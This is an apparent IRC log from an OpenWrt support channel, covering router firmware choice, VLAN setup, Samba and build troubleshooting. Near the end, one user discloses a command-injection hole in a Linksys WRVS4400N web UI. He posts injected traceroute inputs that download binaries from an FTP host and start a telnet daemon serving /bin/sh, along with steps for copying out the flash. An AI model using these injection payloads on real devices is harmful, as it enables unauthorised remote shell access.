[14:54] <Soopaman_Luva> yeah but i bought an actual usb to serial adapter, instead of doing the cell phone adapter mod
[14:55] <Soopaman_Luva> so i have a tradtional serial interface on the other side of the usb cable
[14:56] <SlimG2> I've got a WRT54GL 1.1 (original linksys firmware), what OpenWRT firmware should I choose? Do I still have to choose the 2.4 kernel version to get the wireless support?
[14:56] <loswillios> yes
[14:57] <lBoxy> sn9> is here any samba 3.x ipk for wl-500?
[14:58] <SlimG2> what specific firmware should I choose here?: http://downloads.openwrt.org/kamikaze/7.09/brcm-2.4/
[14:59] <sn9> lBoxy: whatever samba version is there is there
[14:59] <SlimG2> There doesn't seem to be a specific firmware for WRT54GL
[14:59] <nanonyme> wrt54gl is mostly the same as wrt54g
[14:59] <sn9> SlimG2: v4
[14:59] <nanonyme> well, yes
[15:00] <sn9> Soopaman_Luva: usb != traditional
[15:00] <SlimG2> sn9: openwrt-wrt54gs_v4-2.4-squashfs.bin ?
[15:02] <sn9> SlimG2: without the S
[15:04] <SlimG2> sn9: there isn't any other firmwares in that folder that matches *_v4-* as far as I can see
[15:04] <nanonyme> http://downloads.openwrt.org/kamikaze/7.09/brcm-2.4/openwrt-wrt54g-2.4-squashfs.bin looks like the thing
[15:05] <SlimG2> nanonyme: Are you refering to my request?
[15:06] <nanonyme> indeed
[15:07] <SlimG2> thanks guys! ( loswillios, sn9 and nanonyme)
[15:10] <loswillios> lBoxy: there is a samba3 ipk, search the forum
[15:19] <lBoxy> loswillios> wow thank you
[15:20] <lBoxy> or do you know any solution how to connect Vista to samba 2.x
[15:21] <loswillios> no
[15:21] <lBoxy> i found that when I disable security then Vista can sees samba
[15:21] <lBoxy> but looks like there is problem with access on it
[15:36] <FinboySlick> Is it possible to handle vlan within vlan in the switch of a wrtsl54gs? I need to run a trunk port through it.
[15:37] <Soopaman_Luva> (10:00:18 AM) sn9: Soopaman_Luva: usb != traditional
[15:37] <Soopaman_Luva> pardon?
[15:38] <sn9> you don't have a full uart with usb -- avoid it if at all possible
[15:38] <FinboySlick> Soopaman_Luva: It's a liberal progressive USB ;)
[16:13] <holo> i am running kamikaze in wrt54gl, when i make iwlist wl0 scan, the wireless card crashes
[16:14] <holo> is there a reason for this?
[16:14] <sn9> wireless-tools and wl are not fully compatible
[16:26] <mac|gyver> on kamikaze 7.09 I cannot install iptables-mod-nat because it's missing kmod-ipt-nat
[16:26] <mac|gyver> are there any plans to make kmod-ipt-nat available?
[16:29] <MadTitan> I've flashed a wrt54gsv1.1 with firmware built from trunk, now I can't reflash. How do I check boot_wait without nvram pkg.
[16:59] <N-Mi> wow, it took four hours an half to cast a mail via the openwrt-users list. Seems that the server is a little overloaded
[17:00] <Ge0rG> maybe you were greylisted?
[17:00] <N-Mi> Ge0rG: How can I see if I am ?
[17:00] <Ge0rG> N-Mi: look into the header of the mail on the ML
[17:05] <N-Mi> Ge0rG: I've looked at the mail's headers, but I don't see anything.
[17:09] <DomQ> I see that the wiki is on the move these danys
[17:09] <DomQ> s/danys/days
[17:09] <DomQ> How do I choose the right firmware version for my WRT54GL now?
[17:10] <troffasky> check the version of your hardware first
[17:11] <DomQ> I don't have it at hand right now :-(
[17:11] <DomQ> Actually I'm trying to assemble instructions for someone else I'm giving away the router to
[17:12] <DomQ> I see that there are only two hardware revs of WRT54GL available at large,
[17:12] <nanonyme> read release.txt?
[17:12] <DomQ> http://en.wikipedia.org/wiki/Wrt54g#WRT54GL
[17:13] <DomQ> nanonyme: oh. :-)
[17:13] <nanonyme> there is only one type of wrt54gl, really
[17:13] <DomQ> I used to rely on the Wiki (I have another WRT54GL at home), that's why.
[17:13] <nanonyme> and release.txt explains which kamikaze firmware you need
[17:13] <nanonyme> don't rely on the wiki, it might be incorrect
[17:16] <DomQ> nanonyme: uh, no mention of WRT54G* in http://downloads.openwrt.org/kamikaze/7.09/release.txt
[17:16] <nanonyme> DomQ, all broadcom are the same
[17:16] <nanonyme> read under topic Platforms
[17:17] <MadTitan> If I'm running kamikaze, how do i check/set boot_wait?
[17:17] <DomQ> I forgot about WRT54G* being Broadcoms
[17:18] <DomQ> Thanks anyway, so I avail myself of brcm-2.4 and... I don't get a 2.6 kernel right?
[17:18] <nanonyme> unless you don't need wifi, not yet
[17:19] <nanonyme> as the release.txt says
[17:19] <nanonyme> everything else works fine
[17:19] <DomQ> OK, thanks for the RTFM session then :-)
[17:20] <nanonyme> well, especially if you're making instructions for someone else, it's a good idea to know about the release.txt
[17:20] <nanonyme> it contains the most up-to-date info about the firmware packages
[17:40] <DomQ> nanonyme: for the record (or lack thereof), the appropriate Wiki page is http://wiki.openwrt.org/OpenWrtDocs/Installing
[17:40] <nanonyme> DomQ, that's obsolete
[17:40] <DomQ> Except that it it is no longer linked with the homepage (perhaps because it deals with Whiterussian?)
[17:40] <DomQ> heh
[17:40] <nanonyme> yups
[17:41] <nanonyme> chapter 3 should still be valid though
[17:41] <DomQ> 2.1 also
[17:42] <nanonyme> not really
[17:42] <nanonyme> 2.1 is one of the parts that is lagging behind
[17:43] <DomQ> well, the difference between trx and bin is helpful to me, as is the table matching WRT54G flavors to binary names
[17:43] <MadTitan> ok, I cat'd /dev/mtd0 > /tmp/mtd0 and grep'd for boot_wait and it is now off.
[17:43] <nanonyme> DomQ, there are plenty more firmwares than those now
[17:44] <DomQ> Hmm. I'd like to offer to contribute to the Wiki to restore "Installing", but it's obvious I know too little...
[17:44] <DomQ> Well thanks for the info anyway, my own questions are answered now.
[18:47] <forum2006> .
[18:48] <forum2006> ..
[18:50] <forum2006> cats are so nice :)
[18:51] <Supaplex> lolcats are to
[18:58] <jeff1> Can anyone assist me in understanding how to implament vlan ID 50 to my wrt54gl? I need to access a motorola canopy network tagged with said id
[19:00] <jeff1> Where is HAL when you need him
[19:01] <jeff1> I have looked thu the web site and I can't make sence of the linux syntax. I am used to DOS syntax
[19:07] <FinboySlick> jeff1: Keep me up to date on your query, I have a similar problem (Canopy here too)
[19:09] <TrN> http://www.hydrogenaudio.org/forums/index.php?showtopic=58720 <- semi-complete guide to get started hacking on the WRVS4400N Dual CPU router. :b
[19:13] <FinboySlick> jeff1: I seem to remember that there is a /sys entry to have the switch strip vlans.
[19:15] <jeff1> I have the commands for doing this
[19:15] <jeff1> my problem is I don't understand linux syntax
[19:15] <josephus> what is linux syntax?
[19:16] <jeff1> Usage: vconfig COMMAND [OPTIONS] ...
[19:16] <jeff1> vconfig lets you create and remove virtual ethernet devices.
[19:16] <jeff1> Options:
[19:16] <jeff1> add [interface-name] [vlan_id]
[19:16] <jeff1> rem [vlan-name]
[19:16] <jeff1> set_flag [interface-name] [flag-num] [0 | 1]
[19:17] <josephus> lol
[19:17] <jeff1> the command is vconfig
[19:18] <TrN> I guess nobody is interested in hacking the WRVS4400N, eh?
[19:18] <jeff1> usage: vconfig COMMAND [options]
[19:18] <jeff1> options: add [interface-name] [vlan_id]
[19:18] <jeff1> rem [vlan-name]
[19:19] <jeff1> set_flag [interface-name] [flag-num] [0 | 1]
[19:20] <jeff1> set_egress_map [vlan-name] [skb_priority] [vlan_qos]
[19:21] <jeff1> set_ingress_map [vlan-name] [skb_priority] [vlan_qos]
[19:21] <jeff1> set_name_type [name-type]
[19:21] <jeff1> any clue?
[19:21] <josephus> no
[19:58] <forum2006> .
[20:10] <TrN> I see some people are reading my post.
[20:11] <TrN> OpenWRT would really be neat on this monster.
[20:11] <TrN> But I'll settle for expanding the stock Linksys firmware for now.
[20:45] <forum2006> .
[20:52] <denken> can you, or can you not reflash a wrt54g3g back to stock linksys firmware after flashing it with openwrt? linksys only supplies a .bin...
[20:55] <_Fallen> bin is a trx with linksys specific headers
[20:55] <_Fallen> I believe it was remove the first 32 bytes
[20:55] <_Fallen> then you have a trx you can write with mtd
[20:56] <_Fallen> but dont take my word for it
[20:56] <denken> ah thats what i was wondering
[20:56] <denken> so it wont "just work"
[20:56] <_Fallen> I'm not sure if webif detects this, I'm totally off track with openwrt
[20:56] <denken> ive got a number of wrt54g's but this 54g3g is my one-and-only internet connection
[20:56] <_Fallen> I think I'm still running rc5 on most of my wrts
[20:56] <denken> just wanna leave myself a way out
[20:56] <denken> hehe i was for a long time too
[20:57] <denken> just finally upgraded most of hte units here to 7.07
[21:13] <h3sp4wn> denken: why when 7.09 is out ? (and only a bugfix release)
[21:18] <FinboySlick> Anybody here familiar with the inner workings of vtun? I want to know if it will pack smaller ethernet frames into a single udp packet.
[21:23] <thermoman> did you hear buffalo is shipping dd-wrt preinstalled on a new router they sell
[21:25] <Warod> fail
[21:26] <Wonka> TheCompWiz: i saw that... assholes...
[21:30] <h3sp4wn> thermoman: Did #openwrt care ?
[21:42] <forum2006> .
[21:46] <mac|gyver> what's the best way to run a pppoe client? rp-pppoe-client or the ppp module?
[21:51] <forum2006> .
[21:52] <thermoman> h3sp4wn: i dunno. thought it's nice to hear companies bundle OSS-firmwares with their hardware
[21:54] <h3sp4wn> thermoman: If it was openwrt it may be more of interest
[21:55] <thermoman> sure
[21:55] <h3sp4wn> You can get compex stuff specifically designed for openwrt
[21:56] <h3sp4wn> perhaps thats not totally accurate as you can get the same stuff with a crippled bootloader also
[21:56] <J4k3> WOO
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[21:56] <J4k3> xv6700 in my hand
[21:56] <J4k3> well, on the desk right now, soon as I'm done typing its back in my hand
[21:56] <J4k3> does openwrt run on this yet?!?! :D
[22:01] <forum2006> LOL
[22:10] <mac|gyver> is there a default way to get the ip address of a certain interface?
[22:11] <denken> h3sp4wn: when i say "just upgraded" i mean in the last couple months
[22:14] <StormSSK> *Winces* Yes ?
[22:15] <StormSSK> Anyone around who can provide me a hand with a troublesome WGT634U ?
[22:16] <agaffney> StormSSK: troublesome how?
[22:16] <StormSSK> Well, it wont take up an IP on the WAN interface .. mostly due to the fact of my own incompetence me thinks
[22:18] <h3sp4wn> StormSSK: static or dhcp ?
[22:18] <StormSSK> DHCP
[22:19] <h3sp4wn> wan being wireless or just normal wan ? (using trunk ?)
[22:19] <StormSSK> Normal WAN
[22:19] <StormSSK> ISP provides Cable Modem, suppling ISP IP to WAN Interface
[22:20] <StormSSK> Basicly from what i could see .. the configuration that comes with the Firmware standard distro should work out of the box ... me thinks
[22:20] <h3sp4wn> Yep unless there is some stuff with it needing the mac address registered (or cloned)
[22:21] <StormSSK> no nothing like that
[22:21] <TheCompWiz> StormSSK: ... is it a cable modem?
[22:22] <h3sp4wn> trunk r9456 definately works for me (and I have to login to a private network to register the mac)
[22:22] <StormSSK> yes
[22:22] <StormSSK> cable modem
[22:23] <StormSSK> WTF
[22:23] <TheCompWiz> Many cable modems have a built-in arp cache... which dosn't clear immediately.
[22:23] <StormSSK> It got an IP just for restarting the modem :$
[22:23] <TheCompWiz> contact your ISP & ask them politely to reset the arp cache.
[22:23] <TheCompWiz> cloning the mac would have solved the problem too.
[22:24] <StormSSK> :)
[22:24] <StormSSK> This be dumb :)
[22:24] <StormSSK> but seems to have worked
[22:24] <StormSSK> now how to get the forsaken XWGT on it :P
[22:24] <TheCompWiz> y'mean... xwrt?
[22:25] <StormSSK> Yeah :$
[22:25] <TheCompWiz> read the how-to. (I usually add an ipkg repository & use ipkg to install)
[22:25] <StormSSK> yeah
[22:25] <StormSSK> i had the page open ....
[22:25] <StormSSK> just cant seem to find where i got it to
[22:30] <StormSSK> just an added thing :) is it possible to update from 7.07 to 7.09 through ipkg update ?
[22:33] <lBoxy> forum2006 are you up?
[22:34] <lBoxy> or anybody similar able and willing to help me with solution for trouble samba and Vista?
[22:34] <forum2006> not really. i have to play with my new cat :)
[22:35] <lBoxy> which one?
[22:36] <lBoxy> 2 legs, 4 legs, or many legs? :-) (many legs = chips in eletronics)
[22:37] <forum2006> 4 legs
[22:37] <forum2006> the animal :)
[22:37] <Wonka> cats are cute...
[22:38] <lBoxy> yes, if they are alive, 10 minutes ago i saw one died on trails :-(
[22:38] <forum2006> yeah indeed. the cat is just two month old and like to play the whole day
[22:38] <lBoxy> well, the best solution is to have all 3 kinds of cats
[22:39] <lBoxy> and especialy many species of 2 legs cats :-)
[22:39] <lBoxy> forum2006> do you think, when your cat will come to bed, is any chance to find solution for me?
[22:40] <Wonka> two-square-meter cats are non-cute, right
[22:40] <forum2006> no. because i don't use samba
[22:41] <lBoxy> Wonka> it is equal to 2 "human" 2legs cats
[22:42] <lBoxy> it is acceptable :-)
[22:50] <wescotte> When running a router w/ openWRT do you need to perform a shutdown or is it safe to just pull the plug?
[22:51] <blogic> ts safe to pull the plug
[22:51] <wescotte> blogic: thanks
[22:51] <blogic> :P
[22:51] <wescotte> I assumed it was but I just wanted to make sure
[23:00] <lBoxy> anybody else who is without cats and can help me with samba? :-)
[23:04] <baka> whats the magic words to look for if i want to do vlan tagging? searching for the obvious one (vlan) only gives me how to configure the builtin switch thing ... which i dont think is related to outside-vlan-tagging.
[23:04] <blogic> baka: vconfig ?
[23:05] <baka> oooh. i was looking for a package, didnt even check if it is already installed. *blushes*
[23:05] <blogic> vconfig add eth0 123
[23:05] <MrParanoia> i think i'll buy a spare router in case i fry my router doing this openwrt (especially since i haven't found a way to do this boot_wait stuff)
[23:05] <blogic> ifconfig eth0.123 192.168.123.1 up
[23:06] <blogic> 192.168.123.1 will then be tagged with vid=123
[23:06] <baka> bah, i might hammer this into the wiki later, i cant be the only one trying to make german vdsl work. X)
[23:07] <blogic> baka: who is our provider ?
[23:07] <baka> there is only one for that: t-home / t-entertain / t-online ... or whatever this weeks "brand" for it is.
[23:08] <blogic> oki
[23:08] <baka> they have the pppoe on vlan7, or so the intarweb says. :)
[23:09] <forum2006> i'm happy not to deal with t-home and pppoe anymore :)
[23:09] <baka> tell me any other way i can get 10M up and 50M down at home at a not entirely unreasonable price. X)
[23:10] <forum2006> probably difficult. but i'm happy with cable internet 6000/460 :)
[23:11] <baka> this is an upgrade from adsl with 3000:640 for me ...
[23:15] <blogic> how much do you pay ?
[23:16] Action: blogic currently has t-dsl 16k
[23:17] <baka> only available woth phone and TV crap i dont care about. about 75eur/month. which i dont mind because it will replace a dedicated server.
[23:17] <baka> 10Mbps up == TBs per month
[23:17] <blogic> hehe
[23:24] <forum2006> i pay 20euros/month for cable internet
[23:25] <baka> 29.90 here ...
[23:25] <baka> i am not too happy with the quality of kabeldeutschland IP though.
[23:26] <baka> problems that are not unexpected on a shared medium, but still.
[23:27] <forum2006> cable internet isn't a shared medium...
[23:28] <baka> i guess we are using different ideas about "cable" and "shared medium" there. :)
[23:39] <baka> sigh. "vconfig add vlan1 7" doesnt give me a vlan1.7 ... it gives me a vlan7 which does not seem to do what i want it to. :(
[23:48] <Rince> question: I have my kamikaze on the routerboard-system; but wireless doesn't do encryption... any hints what could be wrong? my wireless-config is in http://paste.debian.net/41353
[23:57] <yodaz> do you know where I can find a http://openwrt.org/downloads/snapshots/fonera-2.6/packages/Packages mirror please ?
[23:57] <yodaz> can I use packages from http://downloads.openwrt.org/snapshots/packages-mips/packages/ instead ?
[00:00] --- Sat Nov 3 2007
[00:02] <rickb|server> Want me to try wr again?
[00:04] <bflorin> nop
[00:04] <bflorin> what image do u use?
[00:04] <bflorin> this one?
[00:05] <bflorin> http://downloads.x-wrt.org/xwrt/kamikaze/7.09/brcm-2.4/openwrt-brcm-2.4-squashfs.trx
[00:05] <rickb|server> openwrt-wrt54g-2.4-squashfs
[00:05] <forum2006> goto dd-wrt
[00:05] <bflorin> :P
[00:09] <bflorin> rickb|server: http://www.dd-wrt.com/dd-wrtv2/downloads/stable/dd-wrt.v23%20SP2/standard/dd-wrt.v23_wrt54g.bin
[00:09] <bflorin> ;)
[00:09] <rickb|server> Just downloaded it. lol.
[00:09] <bflorin> good luck... go to sleep
[00:09] <bflorin> :D
[00:09] <bflorin> tired
[00:09] <rickb|server> thx
[00:09] <rickb|server> :)
[00:22] <hachi> does dnsmasq have problems with SRV records? I'm getting empty responses to things that should have SRV records
[00:23] <nabcore> check for filterwin2k in /etc/dnsmasq.conf
[00:26] <moonwatcher> nbd: ping
[00:28] <hachi> the option of filtering SRV records flat out breaks xmpp server to server connections, and kinda cripples client to server a little bit
[00:28] <hachi> is this on by default in openwrt's dnsmasq?
[00:30] <nab-core> https://dev.openwrt.org/ticket/2566
[00:31] <hachi> ooo, nift
[00:31] <nab-core> nift?
[00:31] <hachi> 'nifty', sorry
[00:42] <alesan> hey
[00:49] <alesan> mh is there any ARM port of openwrt at the moment?
[00:56] <thepeople> alesan: at91 is an arm based platform
[01:26] <mgouget> Hello!
[02:42] <tinman_gz> anyone know if openwrt is going to support dual card full duplex setups like nstreme?
[02:42] <tinman_gz> or is that just load ballancing on 2 cards?
[02:43] <tinman_gz> s/ballancing/balancing/
[04:39] <TrN> On the WRVS4400N, I have a quick hack.
[04:40] <TrN> You can execute any shell command via a hole in the webui.
[04:40] <TrN> If you are interested.
[04:40] <TrN> Administration -> Diagnostics -> Traceroute, enter ;/bin/cat /proc/cpuinfo
[04:40] <TrN> or whatever. :)
[04:41] <TrN> I just downloaded the GPL sources and decided to have a really quick look at the UI and it has huge holes.
[04:41] <TrN> You can also brice the router by putting invalid characters in places that'll break startup scripts.
[04:41] <TrN> *brick
[04:41] <TrN> I assume this would be a place people might be interested.
[04:42] <TrN> uname is Linux router 2.4.27-star #143 Tue Sep 4 11:09:43 CST 2007 armv4l unknown
[04:43] <TrN> Might not want to leak this one too much until we get this hacked. :b
[04:44] <TrN> Filesystem 1k-blocks Used Available Use% Mounted on
[04:44] <TrN> /dev/ram0 13409 9864 3545 74% /
[04:44] <TrN> it seems writable too.
[04:44] <TrN> at least mounted rw.
[04:45] <TrN> ext2fs
[04:50] <loswillios> TrN: that probably is something that should go into the wiki (toh.openwrt.org)
[04:50] <TrN> I'm suprised nobody mentioned it before.
[04:51] <TrN> I know OpenWRT/DD-WRT/whatever doesn't support this router yet.
[04:51] <TrN> but it seems everyone was anxious for OS access.
[04:51] <loswillios> heh ok
[04:51] <TrN> I hope I can just rebuild the stock firmware as they released it today with dropbear.
[04:52] <TrN> WRVS4400N V1.1.03
[04:52] <loswillios> that would be a start I guess
[04:52] <TrN> Easier to play with at least.
[04:52] <TrN> I have no idea what it would take to port OpenWRT/whatever to this.
[04:55] <TrN> but to be able to install some user defined software would be great I guess.
[04:56] <Arc> so i need to add zebra and nano
[04:57] <Arc> does anyone know where I could find these packages?
[04:59] <thepeople> http://downloads.openwrt.org/kamikaze/packages/
[04:59] <thepeople> quagga is there for routing
[05:00] <Arc> does quagga do bgp?
[05:02] <thepeople> http://www.quagga.net/
[05:02] <Arc> why is it better than zebra?
[05:05] <thepeople> I don't know if it is, either way you will have to compile trunk to get quagga
[05:05] <Arc> trunk doesnt compile for me
[05:09] <thepeople> anything or just some packages?
[05:09] <Arc> it fails after about 5 lines
[05:10] <Arc> some error in one of the basic files
[05:11] <thepeople> do you have a pastebin?
[05:12] <Arc> at the moment im very limited since im typing on a mouseless server with only one vty
[05:13] <Arc> /home/arc/work/kamikaze/include/target.mk:78: *** missing `endif'. Stop.
[05:13] <Arc> make[3]: *** [target/linux/prereq] Error 2
[05:13] <Arc> make[2]: *** [/home/arc/work/kamikaze/staging_dir//stamp/.target_prereq] Error 2
[05:13] <Arc> that is the first line it posts now when I run make
[05:14] <thepeople> try removing tmp/ and then update trunk and run make menuconfig then make
[05:19] <Arc> btw b1:41:e1:2c:ed:b0:60:27:50:4f:74:3e:41:b6:2c:bc:c7:f1:fb:a0 is correct?
[05:19] <thepeople> ?
[05:21] <Arc> for the server fingerprint
[05:21] <Arc> what does this mean?
[05:21] <Arc> Collecting package info: package/b43ERROR: please fix package/b43/Makefile
[05:23] <thepeople> it means that the makefile hasn't been updated since there was a change in the build system
[05:23] <thepeople> make sure that your packages directory has been updated
[05:24] <Arc> ++ mkdir -p /home/arc/work/kamikaze/staging_dir/toolchain-_gcc4.1.2
[05:24] <Arc> ++ cd /home/arc/work/kamikaze/staging_dir/toolchain-_gcc4.1.2
[05:24] <Arc> ++ mkdir -p bin lib include stamp
[05:24] <Arc> Checking 'bison'... ok.
[05:24] <Arc> and then the same error as before.
[05:26] <thepeople> hmm, I don't know then
[05:26] <thepeople> I don't see that with the latest verson of trunk
[05:27] <Arc> and how do i update the packages? i just downloaded both tonight and svn up on the packages directory doesnt yield that many changes
[05:28] <thepeople> svn up on the packages directory updates it
[05:29] <Arc> well it didnt update all the makefiles it was complaining about
[05:32] <Arc> if i delete the offending file, svn up, then make, it still generates that error
[05:34] <TrN> Can anyone send me a utelnetd binary, by chance?
[07:05] <onovy> hi, i just re-flashed asus wl-hdd with new revision of kamikaze, it's booting only to failsafe with reset button pushed, and if i try to do 'firstboot' or mount_root i will write:
[07:05] <onovy> Segmentation fault
[07:05] <onovy> MTD partition not found.
[07:09] <onovy> huh, 'less' is segfaulting too :(
[07:11] <pc500> Can I use a white russian package on kamikaze?
[07:13] <Soopaman_Luva> sn9, awake?
[07:44] <sn9> Soopaman_Luva: a bit busy atm
[07:49] <Arc_> wow, a new way to spam IRC.
[07:50] <sn9> it doesn't go in the public log, btw
[08:00] Action: gotnone has been waiting for a reason to go to Vietnam... :P
[08:00] <TrN> haha.
[08:00] <TrN> I did it, I got shell access to a WRVS4400N via telnet with only the webui.
[08:01] <TrN> no flashing.
[08:01] <gotnone> anyway is the 4400 an ar7 based machine?
[08:02] <TrN> Not sure how to even tell.
[08:02] <TrN> Processor : FA526id(wb) rev 1 (v4l)
[08:02] <TrN> BogoMIPS : 153.60
[08:02] <TrN> Features : swp half thumb
[08:02] <TrN> Hardware : STAR_STR9100
[08:02] <TrN> binaries are identified as ARM by file.
[08:03] <gotnone> ahh, nope, ar7's are mipsel
[08:03] <TrN> ELF 32-bit LSB executable, ARM, version 1 (ARM), for GNU/Linux 2.0.0, dynamically linked (uses shared libs), stripped
[08:04] <sn9> TrN: what brand is that?
[08:04] <sn9> not linksys...
[08:04] <gotnone> is there a table of hardware entry for your device?
[08:04] <TrN> linksys
[08:05] <TrN> no idea.
[08:05] <sn9> what kinds of connectors does it have?
[08:06] <TrN> It's got 5 gige.
[08:06] <TrN> I got a shell by exploiting unchecked input in the webui.
[08:06] <TrN> And used that to upload a cross-compiled mknod to create /dev/pts entries, then upload a utelnetd binary I also cross-compiled.
[08:07] <sn9> 5 gige? 4 lan, 1 wan?
[08:07] <TrN> Yes, but all one swtich.
[08:07] <sn9> nothing else?
[08:08] <TrN> well, 802.11/g/b/n
[08:08] <sn9> ok...
[08:08] <TrN> 64MB RAM, 8MB flash
[08:08] <sn9> 64???????????
[08:08] <TrN> Yes, 64MB.
[08:08] <TrN> # free
[08:08] <TrN> total used free shared buffers
[08:08] <TrN> Mem: 62320 52260 10060 0 476
[08:08] <sn9> that model will not be in production long, then.....
[08:09] <TrN> It's "Linksys Business"
[08:09] <sn9> ah
[08:09] <TrN> "Gigabit VPN Security Router"
[08:09] <TrN> the firmware originally was the worst crap ever.
[08:09] <sn9> oh, those stupid vpn things
[08:09] <sn9> there are very few of those in the TOH
[08:10] <sn9> did it come from a store shelf?
[08:11] <TrN> Yep, it's out normally now.
[08:11] <sn9> for something like $250, right?
[08:11] <TrN> Yeah.
[08:13] <TrN> # cli
[08:13] <TrN> Welcome to Vitesse Ethernet Switch Command Line Interface
[08:13] <TrN> This has all sorts of cool functions.
[08:13] <hkkl> hmmmh.
[08:13] <hkkl> it's hw switch?
[08:13] <hkkl> cool
[08:13] <TrN> # cli -c "?"
[08:13] <TrN> Commands at top level:
[08:13] <TrN> ------
[08:13] <TrN> System - System commands
[08:13] <TrN> Port - Port commands
[08:13] <sn9> switch and "vpn router"
[08:13] <TrN> Sorry.
[08:14] <sn9> it happens
[08:14] <TrN> Anyway...
[08:14] <hkkl> no i was just thinking that it seems like it's asic based switch chip
[08:14] <TrN> this has more features on this program than the web ui does.
[08:15] <sn9> traditionally, that was the case
[08:15] <hkkl> hmmmh, VSC7385 is most likely the chip
[08:15] <c0ffee> i have a problem with kamikaze 7.09, after a few hours uptime, something allocates nearly all memory
[08:16] <TrN> Lacp - 802.3ad LACP Link Aggregation commands
[08:16] <TrN> Rstp - 802.1w RSTP Rapid Spanning Tree commands
[08:16] <TrN> etc
[08:16] <hkkl> jea
[08:16] <hkkl> i'm reading the spec sheet for the chip
[08:16] <c0ffee> i first suspected some userspace app, but according to ps w and top, none of them allocate more than a few kilobyte
[08:16] <sn9> c0ffee: do you have "top" in your busybox?
[08:16] <c0ffee> yes, but nothing allocates more than a few k
[08:16] <notizblock> i wanted to download kamikaze for wrt54gl, but i couldnt find an image in brcm-2.4 tree
[08:16] <sn9> you can sort top output by memory usage
[08:17] <c0ffee> yeah :/
[08:17] <notizblock> which version of kamikaze should i use for wrt54gl ?
[08:17] <c0ffee> i also suspected the tmpfs so i mounted /tmp on some external disk instead
[08:17] <c0ffee> that wasn't the problem as well
[08:18] <sn9> c0ffee: if you don't see anything in top, my guess would be a kernel module
[08:18] <TrN> hkkl/sn9: It's 3am and I'm going to bed.
[08:18] <c0ffee> sn9, any idea how to figure out which?
[08:18] <TrN> But I'm going to compile dropbear and install it on here.
[08:18] <TrN> and I have the GPL source compiling.
[08:18] <TrN> want to see if it works.
[08:18] <TrN> if so I'll just make a new image that has SSH support.
[08:19] <TrN> amazed nobody has hacked this box before, full sources, and it's pretty easy to get a shell.
[08:19] <sn9> c0ffee: rmmod one at a time
[08:19] <TrN> The Intrusion Protection System on this isn't part of the GPL source.
[08:19] <TrN> its also a scary module.
[08:19] <TrN> Module Size Used by
[08:19] <TrN> qr 10240 0
[08:19] <TrN> kris 562304 0
[08:20] <TrN> distributed as kris.o
[08:21] <TrN> http://www.linksys.com/servlet/Satellite?c=L_Product_C2&childpagename=US%2FLayout&cid=1154659754557&pagename=Linksys%2FCommon%2FVisitorWrapper
[08:21] <sn9> haha
[08:23] <sn9> well, only one way to hack that now...
[08:23] <TrN> once I can recompile the stock firmware I'll feel better.
[08:24] <hkkl> TrN: does the switch support vlans? that doesn't get mentioned on brochure i'm reading.
[08:24] <TrN> Yes it does.
[08:24] <TrN> VLAN - VLAN commands
[08:24] <TrN> PVLAN - Private VLAN commands
[08:25] <hkkl> http://www.vitesse.com/products/download.php?fid=269&number=VSC7385&action=do
[08:25] <hkkl> that's the chip i presume it has
[08:25] <TrN> it has a nice example:
[08:25] <TrN> - Port 1 access port in VLAN 100
[08:25] <TrN> - Port 2 hybrid port in VLAN 100 (untagged) and VLAN 101 (tagged)
[08:25] <TrN> - Port 3 trunk port in VLAN 100 and VLAN 101
[08:25] <hkkl> ah, now i found 4k VLANs mentioned
[08:25] <hkkl> yeah.
[08:26] <hkkl> then if it can handle enough simultaneous vlans, 32+, that's pretty cool box
[08:26] <TrN> It even tells you how long your cables are when you plug them in. :b
[08:27] <sn9> surely, not until you also plug in the other end...
[08:30] <TrN> damn DSL
[08:34] <TrN> this is interesting...
[08:34] <hkkl> TrN: has the kernel module for that switch chip, or is there only managing interface in userspace?
[08:35] <sn9> a userspace PHY driver? that would suck
[08:35] <hkkl> sn9: basicly that's SoC switch
[08:35] <TrN> Star9100 Giga Bit Switch ARL Table
[08:35] <TrN> arl_reg_0 : 0
[08:35] <TrN> arl_reg_1 : 130037f1
[08:36] <hkkl> so it might be connected in some pervert way to the rest of the board
[08:37] <sn9> this isn't the 80's -- that kind of design is out of style
[08:37] <hkkl> hey, it's linksys ;)
[08:39] <sn9> at least linksys isn't making full routers run on avr chips
[08:39] <TrN> # cat mtd
[08:39] <TrN> dev: size erasesize name
[08:39] <TrN> mtd0: 00020000 00008000 "BootLoader "
[08:39] <TrN> mtd1: 00020000 00020000 "System Configuration"
[08:39] <TrN> mtd2: 00120000 00020000 "Signature"
[08:39] <TrN> mtd3: 004a0000 00020000 "Main CPU(9202) Kernel"
[08:39] <TrN> damn
[08:39] <hkkl> pastebin ;)
[08:39] <TrN> yeah.
[08:39] <TrN> well, just these two are interesting.
[08:39] <TrN> mtd3: 004a0000 00020000 "Main CPU(9202) Kernel"
[08:39] <TrN> mtd4: 00200000 00020000 "Wireless CPU(9109) Kernel"
[08:40] <sn9> two SoC's?
[08:40] <hkkl> have you opened the box?
[08:40] <sn9> the amiga of routers
[08:40] <TrN> No, I have not, and I dont' really want to void my warranty. :)
[08:41] <hkkl> damn, gonna order one to office
[08:41] <TrN> If anyone is interested....
[08:41] <hkkl> that seems really interesting design
[08:41] <TrN> go to webui, Administration -> Diagnostics, and type the following in the traceroute host box:
[08:41] <TrN> ;/usr/bin/ftpget -v ftp.trnsz.ath.cx /bin/mknod mknod
[08:41] <TrN> ;/bin/mknod /dev/pts/0 c 136 0
[08:41] <TrN> ;/usr/bin/ftpget -v ftp.trnsz.ath.cx /usr/sbin/utelnetd utelnetd
[08:41] <TrN> ;/usr/sbin/utelnetd -p 9023 -l /bin/sh -d
[08:42] <TrN> one port available to telnet in on, woop.
[08:42] <TrN> err, drop ftp. from those, if you want my binaries.
[08:42] <sn9> TrN: can you tell what the bootloader is? something known?
[08:42] <TrN> but anyway.
[08:42] <TrN> sn9: How would I find out?
[08:42] <TrN> I'm not so much the linux guy.
[08:43] <TrN> I'm also not sure if anything survives a reboot or if it's decompressed from flash to RAM.
[08:43] <sn9> can you retrieve files from it?
[08:43] <TrN> considering it's /dev/ram0, I assume its the latter.
[08:43] <TrN> sure, it has ftpput on it.
[08:44] <TrN> it seems that they don't check input on the traceroute box when they shell out to traceroute. :)
[08:44] <TrN> leaves a nice open hole.
[08:44] <sn9> dd if=/dev/mtd/0 of=/tmp/mtd0
[08:44] <sn9> then ftpput the resulting file
[08:44] <TrN> no dd.
[08:45] <sn9> cat?
[08:45] <TrN> Yes, if that'll work.
[08:45] <sn9> cat /dev/mtd/0 > /tmp/mtd0
[08:45] <TrN> Right, just no /dev/mtd
[08:45] <TrN> I'd have to mknod entries for it, like I had to do for the ptys, I guess.
